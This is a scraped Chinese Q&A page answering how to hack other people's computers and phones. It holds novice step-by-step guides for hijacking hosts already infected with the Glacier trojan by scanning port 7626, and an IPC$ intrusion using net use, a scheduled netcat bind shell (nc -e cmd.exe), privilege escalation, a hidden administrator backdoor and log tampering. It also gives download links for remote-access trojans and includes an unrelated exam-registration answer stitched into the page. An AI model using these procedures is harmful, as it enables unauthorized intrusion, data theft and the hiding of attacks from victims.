看了就算你是新手也会入侵电脑了
本文主要讲述用木马攻击别人电脑,国产木马冰河2.2很不错的软件,看完本文后你可以准备一下软件,来试试。呵呵
别做违法的事情哦。本文的主要目的是让大家了解木马的攻击过程,熟悉了,就好防范了。
开始了。。。
步骤如下:
首先的第一步是:
所谓磨刀不误砍柴工嘛。。。
下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。
下载完毕并解压缩之后跟我进行第二步!
第二步
运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。
第三步
在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。
第四步
进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200 等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。
第五步
观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。
下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。
第六步
点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。
第七步
在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。
好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。
第八步
这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、 D:。
第九步
点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!!
第十步
你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:
1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!
2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!!
第十一步
如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。
第十二步
如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功!
第十三步
终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过来的了!
这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的,主要使用的软件就是著名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。其他有兴趣的网络新手们,嘿嘿,开始吧,开始你的木马旅程。。。
参考资料:用木马攻击别人电脑,国产木马冰河2.2很不错的软件
有可以用手机黑客入侵别人电脑,并且控制的黑客软件吗?安卓的。
小同学 你太天真了
能够在电脑的 使用的 “那些” 软件 你研究透了么? 不要研究手机的 跨平台很难.
安卓就像电脑
想要跟别人 “沟通” 得有几个条件
连接 你得连接上啊 wifi是途径之一 这就很有局限性
因为 你要连接的电脑还得有无线供你连接 你还得知道他的 无线密码
不要想 可以用流量上网怎么招 你用流量上网做的事 都有记录
而入.侵的首要本领 就是不留痕迹....
2. 程序 这种东西 兴许有人写 但是 没有人会去发的
( 因为他们害怕因为别人 会给自己带来不必要的麻烦 )
很不可行 不要瞎研究了
手打望采纳 不懂可
有什么软件可以入侵人家的电脑...
IPC入侵攻略!其实针对IPC漏洞入侵的方法目前已经有很多的教程,但是其中很多教程并不完整,所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题,这就是我写这篇文章的原因了。如果你觉得本文也不完整,那只好去找更好的版本了,但是我希望你能把你的意见和建议告诉我,让我不断的完善这篇文章。本文参考了小榕的流光2000说明文档及其它相关文档,也包含了一些自己的心得体会。本文欢迎非商业性转载,但请保持文章完整性并注明出处!:-)
IPC是Internet Process Connection的缩写,也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能,特点是在同一时间内,两个IP之间只允许建立一个连接。好了,废话少说,现在进入主题。
如何找到具有IPC漏洞的主机呢?以前我都是组合一个国外的扫描工具(名字我忘了)和KillUSA的LetMeIn,因为很多工作都是手工完成的,所以速度可想而知了。现在因为有了小榕的流光2000,所以找到这样的主机实在是太简单了,具体操作我就不说了,大家可以参考该软件的说明文档。
好了,假设我们已经找到了一台这样的主机,地址是139.223.200.xxx,管理员帐号是Administrator,密码是123456。进入命令行方式,正式开工。需要说明的是,以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。
F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"
命令成功完成。
F:\》copy nc.exe \\139.223.200.xxx\admin$
已复制 1 个文件。
F:\》net time \\139.223.200.xxx
\\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25
在 \\139.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35
命令成功完成。
F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一项作业,其作业 ID = 0
F:\》telnet 139.223.200.xxx 1234
上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。这样,我们就登上了远程的主机。最理想的情况是这样的,但是,也许你会遇到目标主机的Schedule服务没有启动的情况,那么,at命令就不能用了,我们就需要增加以下步骤。
F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
服务仍未启动。
F:\》netsvc \\139.223.200.xxx schedule /start
Service is running on \\139.223.200.xxx
登上远程主机之后,我们可以做什么呢?这要视这个帐号的权限以及该主机的安全策略来决定。如果你的权限不够的话,可以试试下面的步骤。首先在本地执行下面的命令。
F:\》copy getadmin.exe \\139.223.200.xxx\admin$
已复制 1 个文件。
F:\》copy gasys.dll \\139.223.200.xxx\admin$
已复制 1 个文件。
其次,在远程主机运行下面的命令。
C:\WINNT\system32》getadmin
如果成功的话,你就是这台主机的管理员了,权限够大了吧?:-)
那么,现在我们能做什么呢?改主页?下载SAM数据库?都可以啦!方法有很多,我就不一一说了,具体方法可以参考相关教程。我一般对目标主机上的WORD文档和数据库比较感兴趣,呵呵。。。
其实,如果你在这台机子上面放个木马或者病毒什么的东东,做起事来更容易一些,但是我觉得如果你跟他没什么深仇大恨的话,还是不要这么做了,这样不好。
作完了你要做的事,不要忘了做个后门。
C:\WINNT\system32》net user Guest 30906766
net use Guest 30906766
The command completed successfully.
C:\WINNT\system32》net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully.
这是个比较简单的后门,要想做的更好一些,可以象Linux那样,做出一套RootKits来,其实这样的东东目前已经有了,你只要拿来用就可以了。现在搞破坏真是简单多了,那么多的傻瓜工具任你用,哎!要想自保,不学点安全知识怎么行呢?
最后,我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志,但是我想修理一下还是有用的。NT的日志在什么地方呢?可以参考XUDI的文章。但是有一点要记住的是,日志只能修改,不能删除,否则就是自己把自己出卖了!:-)这方面的命令行工具也不少,你可以到一些国外的站点去看看。
不过,也许这个比较复杂,那么就要你自己去体会了,还有就是上面大家推荐的灰鸽子,还有冰河都是很不错的选择。。。
自己去体会吧,这里我就不说了。不过你要先懂得灰鸽子是什么,还有怎么用
灰鸽子:http://zhidao.baidu.com/question/33189569.html?si=8
灰鸽子下载地址1:http://disk18.sh.com/pick.aspx?code=1434066318
灰鸽子下载地址2:http://haha.ajiezj.com/Software/Catalog172/3494.html
冰河:http://zhidao.baidu.com/question/33594947.html?si=7
冰河下载地址: http://www.skycn.com/soft/1200.html
希望你不要做违法的事情啦,HOHO
参考资料:http://zhidao.baidu.com/question/11093696.html?si=1
什么软件能用我的计算机入侵别人的邮箱,或者电脑。
黑客是入侵别人电脑的方法有9种。 1、获取口令 这又有三种方法:一是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道用户的账号后(如电子邮件@前面的部分)利用一些专门软件强行破解用户口令,这种方法不受网段限制,但黑客要有足够的耐心和时间;三是在获得一个服务器上的用户口令文件(此文件成为Shadow文件)后,用暴力破解程序破解用户口令,该方法的使用前提是黑客获得口令的Shadow文件。此方法在所有方法中危害最大,因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器,而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码,尤其对那些弱智用户(指口令安全系数极低的用户,如某用户账号为zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内,甚至几十秒内就可以将其干掉。 2、放置特洛伊木马程序 特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中,并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。当您连接到因特网上时,这个程序就会通知黑客,来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。 3、WWW的欺骗技术 在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问,如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在:正在访问的网页已经被黑客篡改过,网页上的信息是虚假的!例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑客服务器发出请求,那么黑客就可以达到欺骗的目的了。 4、电子邮件攻击 电子邮件攻击主要表现为两种方式:一是电子邮件轰炸和电子邮件“滚雪球”,也就是通常所说的邮件炸弹,指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”,严重者可能会给电子邮件服务器操作系统带来危险,甚至瘫痪;二是电子邮件欺骗,攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序(据笔者所知,某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务,这为黑客成功地利用该方法提供了可乘之机),这类欺骗只要用户提高警惕,一般危害性不是太大。 5、通过一个节点来攻击其他节点 黑客在突破一台主机后,往往以此主机作为根据地,攻击其他主机(以隐蔽其入侵路径,避免留下蛛丝马迹)。他们可以使用网络监听方法,尝试攻破同一网络内的其他主机;也可以通过IP欺骗和主机信任关系,攻击其他主机。这类攻击很狡猾,但由于某些技术很难掌握,如IP欺骗,因此较少被黑客使用。 6、网络监听 网络监听是主机的一种工作模式,在这种模式下,主机可以接受到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接受方是谁。此时,如果两台主机进行通信的信息没有加密,只要使用某些网络监听工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性,但监听者往往能够获得其所在网段的所有用户帐号及口令。 7、寻找系统漏洞 许多系统都有这样那样的安全漏洞(Bugs),其中某些是操作系统或应用软件本身具有的,如Sendmail漏洞,win98中的共享目录密码验证漏洞和IE5漏洞等,这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏,除非你将网线拔掉;还有一些漏洞是由于系统管理员配置错误引起的,如在网络文件系统中,将目录和文件以可写的方式调出,将未加Shadow的用户密码文件以明码方式存放在某一目录下,这都会给黑客带来可乘之机,应及时加以修正。 8、利用帐号进行攻击 有的黑客会利用操作系统提供的缺省账户和密码进行攻击,例如许多UNIX主机都有FTP和Guest等缺省账户(其密码和账户名同名),有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息,不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕,将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。 9、偷取特权 利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击,前者可使黑客非法获得对用户机器的完全控制权,后者可使黑客获得超级用户的权限,从而拥有对整个网络的绝对控制权。这种攻击手段,一旦奏效,危害性极大。
求助,用什么pc软件可以通过wifi入侵手机
侵入手机有多种方式,WIFI下侵入手机也要从手机和方法两方面看。
1、如果手机不是智能手机,那估计很难入侵。只能监控传输的数据。
2、如果是智能手机,最主要的方式就是诱导用户下载病毒在手机上安装,相当于一个监控端,并且向你传输资料。如果手机有杀毒软件的话会比较麻烦。
3、利用路由器获取手机信息,进行DNS劫持后,使用该网络者的上网记录,登录账号以及明文传输的密码都可以看到。但是现在很多手机软件的密码已经不再通过明文传输,而且搭建DNS服务器比较复杂。
4、可以看看逗绵羊墙地的相关知识,同样可以监控连接WIFI的手机的上网记录,账号等。
手机通过wifi入侵电脑叫什么软件
您好!
山西省现在是全国统考的,一年考两次的。功法上半年考试一般是在3月份,下半年一般是在11月份。全国统考只有国家统一规定大纲,您考小学就买小学的《综合素质》和《教育教学知识与能力》两本教材就可以了。
笔试报名采用网上报名信息输入和现场确认相结合的办法。其中,今年下半年网上信息输入时间为2013年9月18日——22日(节假日可正常填报)。现场确认时间为2013年9月22日——25日,确认点工作时间每天8:30-12:00、15:00-18:00。今年下半年的报名已经截止了,您可以报名明年上半年的。
黑客入侵别人电脑要几个软件?
想黑别人,首先得保护好自己。打好基础最重要,很多黑客都是之不断地被别人黑的过程中成长起来的。然后再反过来学习基础,不然好多都不懂。就像楼上说得抓鸡,传马,远控。要是你一不小心,第一只鸡还没抓到,就掉进人家的蜜罐里,你还不知道,上不上火。就算是让你抓到肉鸡,你不会提权,闹不闹心。就算是你有提权的工具,还有消日志的工具,可是你有不会拿肉鸡做代理,你还想再继续重复前两步吗?hacker这个词在国外是指对电脑知识有一定水平,对电脑知识又深入地研究,而且对电脑知识痴迷的人。类似政治家,体育健将,科学家等,是对电脑非常精通的人的褒奖。但由于它的特殊性,使这个词在中国被贬意化了,变成了网络黑手的意思。这也就是为什么中国的整体黑客水平没有提高的缘故,不是没人教,而是大家太依赖工具了,没有去真正的学基础。很多高水平的黑客经常和我们说这样一句话,“国外的某某网站解释得很详细,你要是英文好的话可以去看看。”看到了吧,这就是中国的悲哀,国外作为研究,把自己的经验和结果无偿的放到网上,大家一起交流一起研究,很多的开放源代码软件也就是这样产生的。而中国有能力分析他们经验的人又不会花时间去翻译,这样中国的两极分化就很明显了,所以就产生了收费教入侵的网站。其实说了这么多就是想告诉你,如果你真想做黑客,先从基础学起,英语是必需的,还要会两种以上的汇编语言。要学会解密,爆破,进攻,防守,还要能做出自己需要的软件,就可以称得上是黑客了,如果你可以在网上不留痕迹的把某某某入侵美国白宫数据库的话,恭喜你,你已经算是超级黑客了,嘿嘿,不过这点好像不太可能。
以上是我在小说里看的,不全是我的观点,希望对你有帮助,如果你岁数小,可以多方面发展。像我一样岁数大的话,只好挑一方面发展了。给你个建议,不要找师傅,前几天刚看了一个帖子,说的就是高手讨厌找师傅的。还是自学的好,网上能找到很多的资料,基础打好了,可以到国外的技术论坛看看。
好了,不说了,我自己都嫌烦了,祝你黑运亨通。
参考资料:黑客小说<黑客传说>
入侵别人电脑要用什么软件 具体步骤怎么入侵 哪位精通电脑的大神帮帮忙教一下~
先确定对方电脑存在什么漏洞
再找到对应漏洞的应用程序
转载请注明出处51数据库 » 用电脑可以入侵手机软件 可以用什么软件入侵别人的电脑
愿有良人伴你心安